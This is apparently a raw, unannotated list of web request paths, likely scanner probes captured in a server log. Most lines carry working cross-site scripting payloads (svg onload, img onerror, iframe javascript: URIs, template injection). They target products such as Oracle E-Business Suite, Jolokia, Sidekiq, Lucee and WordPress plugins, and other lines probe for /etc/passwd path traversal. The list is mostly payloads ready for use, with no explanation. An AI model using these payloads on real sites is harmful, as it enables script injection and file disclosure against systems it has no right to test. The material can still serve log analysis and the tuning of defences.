/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/assets/_core/php/profile.php
/web/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
/web/assets/php/profile.php
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/cas/v1/tickets/
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
/web/cas/v1/tickets/
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/vendor/qcubed/qcubed/assets/php/profile.php
/web/\u001B]8;;https:/example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj?raw
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/
/web/http_header.php
/web/(download)/tmp/poc.txt
/web/wp-admin/admin-ajax.php
/web/wp-admin/admin.php
/web/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/api/snapshots
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/web/v1/kv/25SoNn9yVq5AS9HhA9Fjbm2cSuj?raw
/web
/web/http_header.php
/web/wp-content/plugins/insert-php/readme.txt
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web
/web/sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22
/web/login.php/'%3E%3Csvg/onload=alert%6025SoNhBe3lGs0mBPoABcGMH4JiI%60%3E
/web/search
/web/help/english/index.html?javascript&
/web/thruk/cgi-bin/login.cgi
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web
/web/sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/login.php/'%3E%3Csvg/onload=alert%6025SoNhBe3lGs0mBPoABcGMH4JiI%60%3E
/web/search
/web/help/english/index.html?javascript&
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/auth/realms/master/clients-registrations/openid-connect
/web/thruk/cgi-bin/login.cgi
/web/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/web/kindeditor/php/demo.php
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/php/demo.php
/web/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/php/demo.php
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/autodiscover/autodiscover.json
/web/(download)/etc/passwd
/web/index.php?rest_route=/whm/v3/themesettings
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/phpwiki/index.php/passwd
/web/autodiscover/autodiscover.json
/web/(download)/etc/passwd
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/index.php?rest_route=/whm/v3/themesettings
/web/?{alert(1)}
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/phpwiki/index.php/passwd
/web/_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E
/web/NateMail.php
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SoNdb1aUbIJI6BVuSVEgXILKB')%3E
/web/menu/stapp
/web/login
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/index.php?action=login.index
/web/NateMail.php
/web/MUP/
/web/?ajax-request=jnews
/web/timesheet/login.php
/web/menu/stapp
/web/login
/web/ghost/preview
/web/index.php?action=login.index
/web/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/MUP/
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/timesheet/login.php
/web/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25SoNad7u0RoiMhIt9wX48d7TQp/);marmoset.embed(%27a
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SoNj6Ojf8gjSbvpzr1KSlrraA')%3elujb7/admin/imgProcess.cfm
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25SoNad7u0RoiMhIt9wX48d7TQp/);marmoset.embed(%27a
